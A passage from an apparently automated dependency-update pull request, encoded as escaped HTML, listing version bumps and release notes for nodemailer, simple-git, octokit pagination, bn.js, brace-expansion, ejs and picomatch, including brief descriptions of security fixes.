href=\"https://github.com/nodemailer/nodemailer/commit/4e702e97650aaff442a7bc040957ba9c53c614b8\"\u003e\u003ccode\u003e4e702e9\u003c/code\u003e\u003c/a\u003e chore(master): release 8.0.3 (\u003ca href=\"https://redirect.github.com/nodemailer/nodemailer/issues/1804\"\u003e#1804\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c803d901f195a21edbb2c276b2e116564467aaaa\"\u003e\u003ccode\u003ec803d90\u003c/code\u003e\u003c/a\u003e fix: remove familySupportCache that broke DNS resolution tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/e8c8b92f46f2a82d06d49cc9a6ffc26067f68524\"\u003e\u003ccode\u003ee8c8b92\u003c/code\u003e\u003c/a\u003e fix: fix cookie bugs, remove dead code, and improve hot-path efficiency\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/0e78ee142b83cd967b5c451bb929f11dd4098f8e\"\u003e\u003ccode\u003e0e78ee1\u003c/code\u003e\u003c/a\u003e chore: update dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/af73b4cd165d92271576e27b3678eb028bab5f44\"\u003e\u003ccode\u003eaf73b4c\u003c/code\u003e\u003c/a\u003e chore: upgrade GitHub Actions to latest versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/604b5702e463ed85828de57402b8332a371f838c\"\u003e\u003ccode\u003e604b570\u003c/code\u003e\u003c/a\u003e chore: simplify remaining lib modules for clarity and consistency\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/4ced83d5ce5c61865783d8fb672f98447b52b739\"\u003e\u003ccode\u003e4ced83d\u003c/code\u003e\u003c/a\u003e chore: simplify shared, errors, mailer, mime-node, and mime-funcs modules\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/0cba16e16509d6d2af0899dbb2420e587172f233\"\u003e\u003ccode\u003e0cba16e\u003c/code\u003e\u003c/a\u003e chore: simplify smtp-pool with const, Object.assign, and cleaner control flow\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.1...v8.0.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `simple-git` from 3.21.0 to 3.32.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/steveukx/git-js/releases\"\u003esimple-git's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esimple-git@3.32.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ef704208: Enhanced \u003ccode\u003eprotocol.allow\u003c/code\u003e checks in \u003ccode\u003eallowUnsafeExtProtocol\u003c/code\u003e handling.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/CodeAnt-AI-Security\"\u003e\u003ccode\u003e@​CodeAnt-AI-Security\u003c/code\u003e\u003c/a\u003e for identifying the issue\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.32.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e8d02097: Enhanced clone unsafe switch detection.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.32.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e23b070f: Fix regex for detecting unsafe clone options\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/stevenwdv\"\u003e\u003ccode\u003e@​stevenwdv\u003c/code\u003e\u003c/a\u003e for reporting this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.32.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e1effd8e: Enhances the \u003ccode\u003eunsafe\u003c/code\u003e plugin to block additional cases where the \u003ccode\u003e-u\u003c/code\u003e switch may be disguised\nalong with other single character options.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/JuHwiSang\"\u003e\u003ccode\u003e@​JuHwiSang\u003c/code\u003e\u003c/a\u003e for identifying this as vulnerability.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed5fd4fe: Use task runner for logging use of deprecated (already no-op) functions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.31.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea44184f: Resolve NPM publish steps\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.30.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ebc77774: Correctly identify current branch name when using \u003ccode\u003egit.status\u003c/code\u003e in a cloned empty repo.\u003c/p\u003e\n\u003cp\u003ePreviously \u003ccode\u003egit.status\u003c/code\u003e would report the current branch name as \u003ccode\u003eNo\u003c/code\u003e. Thank you to \u003ca href=\"https://github.com/MaddyGuthridge\"\u003e\u003ccode\u003e@​MaddyGuthridge\u003c/code\u003e\u003c/a\u003e for identifying this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.28.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2adf47d: Allow repeating git options like \u003ccode\u003e{'--opt': ['value1', 'value2']}\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.27.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/steveukx/git-js/blob/main/simple-git/CHANGELOG.md\"\u003esimple-git's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.32.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ef704208: Enhanced \u003ccode\u003eprotocol.allow\u003c/code\u003e checks in \u003ccode\u003eallowUnsafeExtProtocol\u003c/code\u003e handling.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/CodeAnt-AI-Security\"\u003e\u003ccode\u003e@​CodeAnt-AI-Security\u003c/code\u003e\u003c/a\u003e for identifying the issue\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.32.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e8d02097: Enhanced clone unsafe switch detection.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.32.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e23b070f: Fix regex for detecting unsafe clone options\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/stevenwdv\"\u003e\u003ccode\u003e@​stevenwdv\u003c/code\u003e\u003c/a\u003e for reporting this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.32.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e1effd8e: Enhances the \u003ccode\u003eunsafe\u003c/code\u003e plugin to block additional cases where the \u003ccode\u003e-u\u003c/code\u003e switch may be disguised\nalong with other single character options.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/JuHwiSang\"\u003e\u003ccode\u003e@​JuHwiSang\u003c/code\u003e\u003c/a\u003e for identifying this as vulnerability.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed5fd4fe: Use task runner for logging use of deprecated (already no-op) functions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.31.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea44184f: Resolve NPM publish steps\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.31.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e22dc93f: Custom binary plugin should support the use of \u003ccode\u003e~\u003c/code\u003e character, used by Windows to shorten long folder names\nand folder names that have spaces in them (eg: \u003ccode\u003eC:\\Program Files\u003c/code\u003e might become \u003ccode\u003eC:\\PROGRA~1\u003c/code\u003e).\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/skyshineb\"\u003e\u003ccode\u003e@​skyshineb\u003c/code\u003e\u003c/a\u003e for reporting this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/a1170e506eeeaade4a242bfbf6d0620d57872364\"\u003e\u003ccode\u003ea1170e5\u003c/code\u003e\u003c/a\u003e Version Packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/f7042088aa2dac59e3c49a84d7a2f4b26048a257\"\u003e\u003ccode\u003ef704208\u003c/code\u003e\u003c/a\u003e In extension to CVE-2022-25912, switch to case-insensitive check for `protoco...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/4bb20811eb35c0fa5437553cad4eb8ebf8f6f6e6\"\u003e\u003ccode\u003e4bb2081\u003c/code\u003e\u003c/a\u003e Version Packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/7ae7537737bafc1e6559a28816785b10926fb095\"\u003e\u003ccode\u003e7ae7537\u003c/code\u003e\u003c/a\u003e Match tokens to word boundary\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/c47ad103b07ce768cf69aec63e0c9f7f77a1ab0f\"\u003e\u003ccode\u003ec47ad10\u003c/code\u003e\u003c/a\u003e Lint\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/8d02097b726c2bc5360b4f55ee3ecb7e09648e4d\"\u003e\u003ccode\u003e8d02097\u003c/code\u003e\u003c/a\u003e Enhanced clone switch detection\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/f6909a52807512cb4e29a654db2dcd409b019113\"\u003e\u003ccode\u003ef6909a5\u003c/code\u003e\u003c/a\u003e Remove test timeout override\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/77406267ceb19aa901495b6ae414020daf789ebf\"\u003e\u003ccode\u003e7740626\u003c/code\u003e\u003c/a\u003e Update plugin.unsafe.spec.ts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/b562a6c4c1a226d9c7789b72c76784f334c1efac\"\u003e\u003ccode\u003eb562a6c\u003c/code\u003e\u003c/a\u003e Version Packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/23b070f0a4d320af5e745a42ae6176a629409566\"\u003e\u003ccode\u003e23b070f\u003c/code\u003e\u003c/a\u003e Fix regex for CLONE_OPTIONS constant (\u003ca href=\"https://github.com/steveukx/git-js/tree/HEAD/simple-git/issues/1122\"\u003e#1122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/steveukx/git-js/commits/simple-git@3.32.3/simple-git\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for simple-git since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 9.2.1 to 9.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.2.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003e9.2.2\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003ee1e4489\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003e\u003ccode\u003ee1e4489\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `bn.js` from 4.12.0 to 4.12.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/39fe4389c773327ed15f29f77f8b7dbbff4beb4c\"\u003e\u003ccode\u003e39fe438\u003c/code\u003e\u003c/a\u003e 4.12.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/67ecb35dabaf252001b649c12d69c4b57deac6f6\"\u003e\u003ccode\u003e67ecb35\u003c/code\u003e\u003c/a\u003e backport(4.x): fix imaskn state (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/317\"\u003e#317\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/c4098bac2470418f8e0f6bf11fe0cb676a2b9047\"\u003e\u003ccode\u003ec4098ba\u003c/code\u003e\u003c/a\u003e 4.12.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/6277fd705e51edae1c404c65f03ba2e512706945\"\u003e\u003ccode\u003e6277fd7\u003c/code\u003e\u003c/a\u003e backport(4.x): Fix imuln/muln with zero (backport of \u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/313\"\u003e#313\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/314\"\u003e#314\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/ac0d4afaae91701815b9edc19789e44e7690d688\"\u003e\u003ccode\u003eac0d4af\u003c/code\u003e\u003c/a\u003e 4.12.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/a5f14b43ec61bc7cafc6de2e7444913b9f581b00\"\u003e\u003ccode\u003ea5f14b4\u003c/code\u003e\u003c/a\u003e Fix serious issue in \u003ccode\u003e.toString(16)\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/309\"\u003e#309\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/0cd2661b9d08512263c940662586042ef8aaccc6\"\u003e\u003ccode\u003e0cd2661\u003c/code\u003e\u003c/a\u003e Remove package-lock.json added by npm\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/indutny/bn.js/compare/v4.12.0...v4.12.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.13\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ejs` from 3.1.9 to 3.1.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mde/ejs/releases\"\u003eejs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.1.10\u003c/h2\u003e\n\u003cp\u003eVersion 3.1.10\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/d3f807dea9ce904e20a47a661f2310ce9134dc2a\"\u003e\u003ccode\u003ed3f807d\u003c/code\u003e\u003c/a\u003e Version 3.1.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/9ee26dde5d7015d9c0e2ff87314cabeac5247c02\"\u003e\u003ccode\u003e9ee26dd\u003c/code\u003e\u003c/a\u003e Mocha TDD\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/e469741dca7df2eb400199e1cdb74621e3f89aa5\"\u003e\u003ccode\u003ee469741\u003c/code\u003e\u003c/a\u003e Basic pollution protection\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/715e9507fa3e6122dc6430fe0f25a6e6ded300c1\"\u003e\u003ccode\u003e715e950\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mde/ejs/issues/756\"\u003e#756\u003c/a\u003e from Jeffrey-mu/main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/cabe3146ad964a1e98db7742abf435906ca79406\"\u003e\u003ccode\u003ecabe314\u003c/code\u003e\u003c/a\u003e Include advanced usage examples\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/29b076cdbbf3eb1b4323b33299ab6d79391b2c33\"\u003e\u003ccode\u003e29b076c\u003c/code\u003e\u003c/a\u003e Added header\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/11503c79af882e3635b513d57c7f1813792eb127\"\u003e\u003ccode\u003e11503c7\u003c/code\u003e\u003c/a\u003e Merge branch 'main' of github.com:mde/ejs into main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/7690404e2fc1688756938e4d2fc19e0fac77d736\"\u003e\u003ccode\u003e7690404\u003c/code\u003e\u003c/a\u003e Added security banner to README\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/f47d7aedd51a983e4f73045f962b1209096b5800\"\u003e\u003ccode\u003ef47d7ae\u003c/code\u003e\u003c/a\u003e Update SECURITY.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/828cea1687e3db459ab09d2f405d2444c7580b90\"\u003e\u003ccode\u003e828cea1\u003c/code\u003e\u003c/a\u003e Update SECURITY.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mde/ejs/compare/v3.1.9...v3.1.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.3.2\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains constructor by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ehttps://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md\"\u003epicomatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease history\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAll notable changes to this project will be documented in this file.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"http://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e\nand this project adheres to \u003ca href=\"http://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003eChangelogs are for humans, not machines.\u003c/li\u003e\n\u003cli\u003eThere should be an entry for every single version.\u003c/li\u003e\n\u003cli\u003eThe same types of changes should be grouped.\u003c/li\u003e\n\u003cli\u003eVersions and sections should be linkable.\u003c/li\u003e\n\u003cli\u003eThe latest version comes first.\u003c/li\u003e\n\u003cli\u003eThe release date of each versions is displayed.\u003c/li\u003e\n\u003cli\u003eMention whether you follow Semantic Versioning.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eChangelog entries are classified using the following labels \u003cem\u003e(from \u003ca href=\"http://keepachangelog.com/\"\u003ekeep-a-changelog\u003c/a\u003e\u003c/em\u003e):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eAdded\u003c/code\u003e for new features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eChanged\u003c/code\u003e for changes in existing functionality.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDeprecated\u003c/code\u003e for soon-to-be removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eRemoved\u003c/code\u003e for now removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eFixed\u003c/code\u003e for any bug fixes.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSecurity\u003c/code\u003e in case of vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e4.0.0 (2024-02-07)\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix bad text values in parse \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/126\"\u003e#126\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/connor4312\"\u003e\u003ccode\u003e@​connor4312\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove process global to work outside of node \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/129\"\u003e#129\u003c/a\u003e, thanks to \u003ca 